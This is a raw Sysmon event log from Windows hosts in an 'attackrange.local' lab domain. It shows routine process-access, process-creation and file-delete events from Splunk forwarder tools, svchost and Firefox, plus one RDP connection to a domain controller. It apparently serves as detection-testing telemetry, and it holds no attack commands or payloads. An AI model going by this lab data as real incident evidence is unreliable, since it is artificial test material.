07:45:26.781{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806313Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:45:26.781{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806312Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:26.781{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806311Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:26.781{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F316-60EB-4679-00000000D001}3240C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806310Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:26.781{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F316-60EB-4679-00000000D001}3240C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806309Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:26.766{0C1E0330-F316-60EB-4679-00000000D001}3240C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000806308Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:26.563{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB02FB1D514CE585F52B9BAAE63FA9E4,SHA256=F43D29C1AD2C147AB0ED23A7F1FE79530658108B9C54CDF2651A280C8B0BE1C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806307Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:26.422{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=11B2D9C207525A814897619BB31A818C,SHA256=3441B5C0D63EAC883D58D9D9216976FBE9123CB474B1F472F0CDB91D01885105,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806306Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:26.094{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F316-60EB-4579-00000000D001}3164C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x8000000000000000806305Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:26.094{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806304Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:26.094{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x8000000000000000806303Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:26.094{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806302Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:26.094{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806301Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:45:26.094{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806300Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:26.094{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806299Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:45:26.094{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806298Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:26.094{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806297Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:45:26.094{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806296Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:26.094{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F316-60EB-4579-00000000D001}3164C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806295Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:26.078{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F316-60EB-4579-00000000D001}3164C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806294Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:26.079{0C1E0330-F316-60EB-4579-00000000D001}3164C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000806338Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:27.766{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7F426DDD80233EB962B8826DC9EA0BEC,SHA256=D60600A945B95613AF60217D71BF670188CAC048FA44ADE622035C9331A882E9,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000806337Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:27.750{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB6CC13515D7CFC0BEE9ADB69FE014E6,SHA256=D11E0BA9517065C34953DE9A1D8EC4A59A65510CBC80CDD2188A212C605F8BD4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046442Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:18.827{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse3.133.117.249ec2-3-133-117-249.us-east-2.compute.amazonaws.com65086-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001046441Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:27.656{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=208840A43ED3BF431EBB2B572F3E2A95,SHA256=634A225C298B0A5984E4D894FCD11EE4538FD77D2DBE936B1656420AFD651380,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046440Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:27.141{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=2FF8BB4A1A61333868B3A75118DD4585,SHA256=97578FA21030049103916DD8F8817B5AF794F784CE0712F1B0900A48039D7288,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001046439Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:27.141{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=306F0525FE52CEFE24EAD0676B2DB3A7,SHA256=0E4C5A50AA7FA642503541479CF69A87D4BA1EB20C364FB59AF8CB4F8D14FD5F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046438Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:27.141{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=FBAB33A5A60F9A8B7E614AECF2EC34EB,SHA256=8CD9AAC3FB6D9F41C0FA8B82ED69139095965FAC31F99264C0B508E64C305EBB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046437Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:27.141{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=9BE230CECFF8053831A08D4726F265F5,SHA256=94F041A46BE2C6281C6F4D2A736EA5358A58E039322D8411FC17F0A5779B4436,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046436Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:27.141{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=5218A5C0B76F586D3687B4A5B1EA5587,SHA256=BE7D97934E9626C49E3AC975DB657D728E5F70F906F2B61881455FABA00949E7,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001046435Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:27.141{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=EC8C25189B76BF4C511D061B2674E10A,SHA256=8819DAD3118DD5F43410EA316978E12BE192BFAE74D9175F79CD66925CE9D99F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046434Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:27.141{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=B1DA4009F5C646AF012D2F51A48DC314,SHA256=9B297D9F5EBB385AB7198B69FC54B51770E58D14196C574E73DF6368FF59A07A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046433Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:27.141{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C172711955A939D8698F7A0651A1E309,SHA256=536999849FCD81DE214D32B21250586D7C9AC423871C095176ED64C0D9B74B0F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046432Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:27.139{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=523B0AD66793AEB8D4BC4DB231E113B9,SHA256=0C4ADA9E445E0FE62D06D208A711E7E6A5E1FBAC6EDA7665580A7B51BAAFB806,IMPHASH=00000000000000000000000000000000falsetrue 
